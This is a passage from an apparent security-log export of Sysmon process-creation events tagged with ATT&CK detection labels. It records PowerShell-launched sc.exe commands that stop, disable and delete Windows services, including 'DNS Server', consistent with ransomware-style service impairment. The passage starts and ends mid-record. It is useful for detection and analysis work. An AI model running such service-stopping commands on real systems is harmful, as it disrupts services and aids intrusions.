Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete SuperProServer\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:32.531"",""processGuid"":""{df9fc3d3-b3d4-5ecf-0000-001003892b00}"",""processId"":""2356"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete SuperProServer"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:00.880",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:32.505 +ProcessGuid: {df9fc3d3-b3d4-5ecf-0000-00103a882b00} +ProcessId: 6332 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SuperProServer +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 
SuperProServer",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:32.512800400Z"",""eventRecordID"":""3267"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:32.505\r\nProcessGuid: {df9fc3d3-b3d4-5ecf-0000-00103a882b00}\r\nProcessId: 6332\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SuperProServer\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:32.505"",""processGuid"":""{df9fc3d3-b3d4-5ecf-0000-00103a882b00}"",""processId"":""6332"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SuperProServer"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:00.085",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:32.311 +ProcessGuid: {df9fc3d3-b3d4-5ecf-0000-0010f9842b00} +ProcessId: 736 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Serhiez +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 
+ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Serhiez",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:32.315513600Z"",""eventRecordID"":""3264"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:32.311\r\nProcessGuid: {df9fc3d3-b3d4-5ecf-0000-0010f9842b00}\r\nProcessId: 736\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Serhiez\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:51:32.311"",""processGuid"":""{df9fc3d3-b3d4-5ecf-0000-0010f9842b00}"",""processId"":""736"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Serhiez"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:00.022",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:32.189 +ProcessGuid: {df9fc3d3-b3d4-5ecf-0000-0010be812b00} +ProcessId: 7840 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""DNS Server"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""DNS Server\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:32.201718100Z"",""eventRecordID"":""3261"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:32.189\r\nProcessGuid: {df9fc3d3-b3d4-5ecf-0000-0010be812b00}\r\nProcessId: 7840\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""DNS Server\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:32.189"",""processGuid"":""{df9fc3d3-b3d4-5ecf-0000-0010be812b00}"",""processId"":""7840"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""DNS Server\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:00.001",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:32.100 +ProcessGuid: {df9fc3d3-b3d4-5ecf-0000-001067802b00} +ProcessId: 800 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config 
""DNS Server"" Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config \""DNS Server\"" Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:32.113416100Z"",""eventRecordID"":""3260"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:32.100\r\nProcessGuid: {df9fc3d3-b3d4-5ecf-0000-001067802b00}\r\nProcessId: 800\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config \""DNS Server\"" Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:32.100"",""processGuid"":""{df9fc3d3-b3d4-5ecf-0000-001067802b00}"",""processId"":""800"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config \\\""DNS Server\\\"" Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:59.961",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:32.025 +ProcessGuid: {df9fc3d3-b3d4-5ecf-0000-0010867e2b00} +ProcessId: 880 +Image: C:\Windows\System32\sc.exe +FileVersion: 
10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Zational +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Zational",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:32.036116100Z"",""eventRecordID"":""3258"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:32.025\r\nProcessGuid: {df9fc3d3-b3d4-5ecf-0000-0010867e2b00}\r\nProcessId: 880\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Zational\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: 
DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:32.025"",""processGuid"":""{df9fc3d3-b3d4-5ecf-0000-0010867e2b00}"",""processId"":""880"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Zational"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:59.894",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 
12:51:31.878 +ProcessGuid: {df9fc3d3-b3d3-5ecf-0000-0010767b2b00} +ProcessId: 7660 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop AxInstSV +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop AxInstSV",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:31.883414300Z"",""eventRecordID"":""3255"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:31.878\r\nProcessGuid: {df9fc3d3-b3d3-5ecf-0000-0010767b2b00}\r\nProcessId: 7660\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: 
sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop AxInstSV\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 